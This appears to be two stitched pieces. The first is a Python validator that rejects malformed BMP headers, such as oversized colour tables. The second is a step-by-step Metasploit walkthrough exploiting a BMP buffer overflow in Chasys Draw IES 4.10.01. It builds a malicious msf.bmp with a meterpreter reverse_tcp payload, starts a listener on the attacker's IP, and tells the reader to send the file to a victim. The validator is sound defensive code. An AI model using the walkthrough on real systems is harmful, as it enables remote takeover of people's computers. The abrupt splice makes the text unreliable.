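FILE_HEADER = struct.Struct("<2sIHHI")       # BITMAPFILEHEADER: magic, bfSize, res1, res2, bfOffBits
INFO_HEADER = struct.Struct("<IiiHHIIiiII")  # BITMAPINFOHEADER (40 bytes)
HEADERS_SIZE = FILE_HEADER.size + INFO_HEADER.size  # 54
MAX_DIMENSION = 1 << 14   # assumed sane ceiling for width/height
BI_RGB = 0


def validate_bmp(data):
    """Parse and cross-check the headers; raise ValueError on any inconsistency."""
    if len(data) < HEADERS_SIZE:
        raise ValueError("file shorter than the BMP headers")
    magic, bf_size, _, _, off_bits = FILE_HEADER.unpack_from(data, 0)
    if magic != b"BM":
        raise ValueError("bad magic")
    if bf_size != len(data):
        raise ValueError(f"declared size {bf_size} does not match actual size {len(data)}")
    (bi_size, width, height, planes, bpp, compression,
     _size_image, _xppm, _yppm, clr_used, _clr_important) = INFO_HEADER.unpack_from(data, FILE_HEADER.size)
    if bi_size != INFO_HEADER.size:
        raise ValueError(f"unsupported DIB header size {bi_size}")
    if planes != 1 or compression != BI_RGB:
        raise ValueError("only single-plane uncompressed (BI_RGB) bitmaps are accepted")
    if not (0 < width <= MAX_DIMENSION and 0 < abs(height) <= MAX_DIMENSION):
        raise ValueError(f"dimensions {width}x{height} out of range")
    if bpp not in (1, 4, 8, 16, 24, 32):
        raise ValueError(f"unsupported bit depth {bpp}")
    # Colour table: an attacker-controlled biClrUsed must never drive an unbounded read.
    ncolors = clr_used if clr_used else ((1 << bpp) if bpp <= 8 else 0)
    if ncolors > 256:
        raise ValueError(f"colour table of {ncolors} entries exceeds the 256 maximum")
    palette_end = HEADERS_SIZE + 4 * ncolors
    if not (palette_end <= off_bits <= len(data)):
        raise ValueError("pixel data offset inconsistent with headers and file size")
    row_bytes = ((width * bpp + 31) // 32) * 4   # rows are padded to 4-byte boundaries
    pixel_bytes = row_bytes * abs(height)
    if off_bits + pixel_bytes > len(data):
        raise ValueError("pixel data would extend past the end of the file")
    return {"width": width, "height": height, "bpp": bpp,
            "colors": ncolors, "pixel_bytes": pixel_bytes}


def is_valid_bmp(data):
    try:
        validate_bmp(data)
        return True
    except ValueError:
        return False


def make_bmp(width, height, bpp=24):
    """Constructed minimal BMP (zeroed pixels, no palette) used as sample input."""
    row_bytes = ((width * bpp + 31) // 32) * 4
    pixels = bytes(row_bytes * height)
    total = HEADERS_SIZE + len(pixels)
    file_header = FILE_HEADER.pack(b"BM", total, 0, 0, HEADERS_SIZE)
    info_header = INFO_HEADER.pack(INFO_HEADER.size, width, height, 1, bpp, BI_RGB,
                                   len(pixels), 2835, 2835, 0, 0)
    return file_header + info_header + pixels


def corrupt_colour_table(data):
    """Constructed malformed variant: biClrUsed (offset 32 in the info header) set absurdly high."""
    patched = bytearray(data)
    struct.pack_into("<I", patched, FILE_HEADER.size + 32, 0x7FFFFFFF)
    return bytes(patched)


if __name__ == "__main__":
    sample = make_bmp(2, 2)
    print("valid sample:", validate_bmp(sample))
    for label, blob in (("huge colour table", corrupt_colour_table(sample)),
                        ("truncated", sample[:-1])):
        try:
            validate_bmp(blob)
        except ValueError as err:
            print(f"{label}: rejected ({err})")
```

Every read length in a file parser should be derivable only from values that have already been bounded this way; the order of checks (file length first, then header-internal consistency, then derived sizes) keeps each later check from relying on a field that has not yet been verified.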

Exploit Targets
Chasys Draw IES 4.10.01

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/fileformat/chasys_draw_ies_bmp_bof
msf exploit (chasys_draw_ies_bmp_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (chasys_draw_ies_bmp_bof)>set lhost 192.168.1.137 (IP of Local Host)
msf exploit (chasys_draw_ies_bmp_bof)>exploit


After we successfully generate the malicious bmp file, it is stored on your local computer at
/root/.msf4/local/msf.bmp


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.137
exploit

Now send your msf.bmp file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.

